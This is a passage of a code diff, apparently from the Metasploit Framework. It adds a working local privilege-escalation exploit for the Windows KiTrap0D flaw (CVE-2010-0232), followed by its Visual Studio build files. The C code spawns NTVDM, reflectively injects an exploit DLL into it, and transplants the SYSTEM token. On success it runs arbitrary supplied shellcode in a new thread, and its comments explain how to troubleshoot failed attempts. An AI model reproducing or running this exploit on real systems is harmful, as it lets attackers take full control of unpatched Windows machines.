dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Path truncation: %s", cpOutput );
break;
}
dprintf( "[KITRAP0D] elevate_via_exploit_getpath. Trying: %s", cpOutput );
if( GetFileAttributes( cpOutput ) != INVALID_FILE_ATTRIBUTES )
return TRUE;
memset( cpOutput, 0, dwOutputSize );
dwIndex++;
}
} while(0);
return FALSE;
}
/*!
* @brief Helper thread function which runs the given payload directly.
* @param lpPayload The payload shellcode to execute.
* @returns \c ERROR_SUCCESS
*/
DWORD WINAPI execute_payload(LPVOID lpPayload)
{
dprintf("[KITRAP0D] Payload thread started.");
VOID(*lpCode)() = (VOID(*)())lpPayload;
lpCode();
return ERROR_SUCCESS;
}
/*!
* @breif Entry point for the KiTrap0D exploit.
* @remark This is known as CVE-2010-0232.
* @param hElevateModule Handle to the DLL which contains the kitrap0d_payload DLL.
* @param lpPayload Pointer to the shellcode to run on successful exploitation.
* @returns Indication of success or failure.
* @retval ERROR_SUCCESS The exploit worked as expected.
* @retval ERROR_NOT_SUPPORTED The exploit is not supported on this platform.
*/
DWORD elevate_via_exploit_kitrap0d(HMODULE hElevateModule, LPVOID lpPayload)
{
DWORD dwResult = ERROR_SUCCESS;
HANDLE hVdm = NULL;
HANDLE hThread = NULL;
LPVOID lpServiceBuffer = NULL;
LPVOID lpRemoteCommandLine = NULL;
char cWinDir[MAX_PATH] = { 0 };
char cVdmPath[MAX_PATH] = { 0 };
char cCommandLine[MAX_PATH] = { 0 };
DWORD dwExitCode = 0;
DWORD dwKernelBase = 0;
DWORD dwOffset = 0;
DWORD dwServiceLength = 0;
do
{
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting with HMODULE %x ...", hElevateModule);
if (lpPayload == NULL) {
BREAK_WITH_ERROR("[KITRAP0D] payload argument not specified", ERROR_BAD_ARGUMENTS);
}
if (resource_extract_raw(hElevateModule, IDR_DLL_KITRAP0D, "DLL", (LPBYTE*)&lpServiceBuffer, &dwServiceLength) != ERROR_SUCCESS) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
}
if (!dwServiceLength || !lpServiceBuffer) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. Failed to find/load kitrap0d.dll", ERROR_BAD_ARGUMENTS);
}
// 1. first get a file path to a suitable exe...
if (!elevate_via_exploit_getpath(cVdmPath, MAX_PATH)) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. elevate_via_exploit_getpath failed", ERROR_FILE_NOT_FOUND);
}
// 2. Scan kernel image for the required code sequence, and find the base address...
if (!kitrap0d_scan_kernel(&dwKernelBase, &dwOffset)) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_scanforcodesignature failed", ERROR_INVALID_HANDLE);
}
// 3. Invoke the NTVDM subsystem, by launching any MS-DOS executable...
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. Starting the NTVDM subsystem by launching MS-DOS executable");
if (!kitrap0d_spawn_ntvdm(cVdmPath, &hVdm)) {
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. kitrap0d_spawn_ntvdm failed", ERROR_INVALID_HANDLE);
}
// 4. Use RDI to inject the elevator dll into the remote NTVDM process...
// Passing in the parameters required by exploit thread via the LoadRemoteLibraryR inject technique.
_snprintf_s(cCommandLine, sizeof(cCommandLine), sizeof(cCommandLine), "/VDM_TARGET_PID:0x%08X /VDM_TARGET_KRN:0x%08X /VDM_TARGET_OFF:0x%08X\x00", GetCurrentProcessId(), dwKernelBase, dwOffset);
// alloc some space and write the commandline which we will pass to the injected dll...
lpRemoteCommandLine = VirtualAllocEx(hVdm, NULL, strlen(cCommandLine) + 1, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (!lpRemoteCommandLine) {
BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. VirtualAllocEx failed");
}
if (!WriteProcessMemory(hVdm, lpRemoteCommandLine, cCommandLine, strlen(cCommandLine) + 1, NULL)) {
BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. WriteProcessMemory failed");
}
// inject the dll...
hThread = LoadRemoteLibraryR(hVdm, lpServiceBuffer, dwServiceLength, lpRemoteCommandLine);
if (!hThread) {
BREAK_ON_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. LoadRemoteLibraryR failed");
}
// 5. Wait for the thread to complete
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. WaitForSingleObject(%#x, INFINITE);", hThread);
WaitForSingleObject(hThread, INFINITE);
// pass some information back via the exit code to indicate what happened.
GetExitCodeThread(hThread, &dwExitCode);
dprintf("[KITRAP0D] elevate_via_exploit_kitrap0d. GetExitCodeThread(%#x, %p); => %#x", hThread, &dwExitCode, dwExitCode);
switch (dwExitCode)
{
case 'VTIB':
// A data structure supplied to the kernel called VDM_TIB has to have a 'size' field that
// matches what the kernel expects.
// Try running `kd -kl -c 'uf nt!VdmpGetVdmTib;q'` and looking for the size comparison.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to find the size of the VDM_TIB structure", dwExitCode);
case 'NTAV':
// NtAllocateVirtualMemory() can usually be used to map the NULL page, which NtVdmControl()
// expects to be present.
// The exploit thread reports it didn't work.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to map the virtual 8086 address space", dwExitCode);
case 'VDMC':
// NtVdmControl() must be initialised before you can begin vm86 execution, but it failed.
// It's entirely undocumented, so you'll have to use kd to step through it and find out why
// it's failing.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports NtVdmControl() failed", dwExitCode);
case 'LPID':
// This exploit will try to transplant the token from PsInitialSystemProcess on to an
// unprivileged process owned by you.
// PsLookupProcessByProcessId() failed when trying to find your process.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports that PsLookupProcessByProcessId() failed", dwExitCode);
case FALSE:
// This probably means LoadLibrary() failed, perhaps the exploit dll could not be found?
// Verify the vdmexploit.dll file exists, is readable and is in a suitable location.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread was unable to load the injected dll", dwExitCode);
case 'w00t':
// This means the exploit payload was executed at ring0 and succeeded.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread reports exploitation was successful", ERROR_SUCCESS);
default:
// Unknown error. Sorry, you're on your own.
BREAK_WITH_ERROR("[KITRAP0D] elevate_via_exploit_kitrap0d. The exploit thread returned an unexpected error. ", dwExitCode);
}
} while (0);
if (hVdm)
{
TerminateProcess(hVdm, 0);
CloseHandle(hVdm);
}
if (hThread)
{
CloseHandle(hThread);
}
// if we succeeded, we need to run our payload in another thread.
if (dwResult == ERROR_SUCCESS) {
CreateThread(0, 0, execute_payload, lpPayload, 0, NULL);
}
return dwResult;
}
/*!
* @brief Entry point to the exploit DLL.
* @param hinstDLL Reference to the DLL's module.
* @param dwReason The reason code for the invocation.
* @param lpReserved A reserved value, used by the exploit code.
* - \c RUN_EXPLOIT_KITRAP0D - Execute the KiTrap0d exploit.
* @returns \c TRUE all the time.
* @remark The \c lpReserved value contains a number which identifies which
* exploit to invoke. This needs to be passed in from MSF, otherwise
* no exploit funtionality will be invoked.
*/
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
DWORD dwExploit = 0;
BOOL bReturnValue = TRUE;
switch (dwReason)
{
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
elevate_via_exploit_kitrap0d(hinstDLL, lpReserved);
break;
case DLL_QUERY_HMODULE:
if (lpReserved != NULL) {
*(HMODULE *)lpReserved = hAppInstance;
}
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}

BIN
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.rc vendored Normal file
View File

Binary file not shown.

150
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj vendored Normal file
View File

@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6B678096-E18A-427A-A8A3-C268AD2E12B8}</ProjectGuid>
<RootNamespace>kitrap0d</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120_xp</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
exit 0</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\kitrap0d.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\kitrap0d.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="..\common\ResourceLoader.c" />
<ClCompile Include="kitrap0d.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
<ClInclude Include="..\common\common.h" />
<ClInclude Include="..\common\ResourceLoader.h" />
<ClInclude Include="resource.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="kitrap0d.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

35
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters vendored Normal file
View File

@ -0,0 +1,35 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="kitrap0d.c" />
<ClCompile Include="..\common\ResourceLoader.c">
<Filter>common</Filter>
</ClCompile>
<ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>RDI</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="resource.h" />
<ClInclude Include="..\common\common.h">
<Filter>common</Filter>
</ClInclude>
<ClInclude Include="..\common\ResourceLoader.h">
<Filter>common</Filter>
</ClInclude>
<ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h">
<Filter>RDI</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="kitrap0d.rc" />
</ItemGroup>
<ItemGroup>
<Filter Include="common">
<UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
</Filter>
<Filter Include="RDI">
<UniqueIdentifier>{662e77af-b8cd-4717-a3f2-87b2ec57f46c}</UniqueIdentifier>
</Filter>
</ItemGroup>
</Project>

BIN
external/source/exploits/CVE-2010-0232/kitrap0d/resource.h vendored Normal file
View File

Binary file not shown.

Some files were not shown because too many files have changed in this diff Show More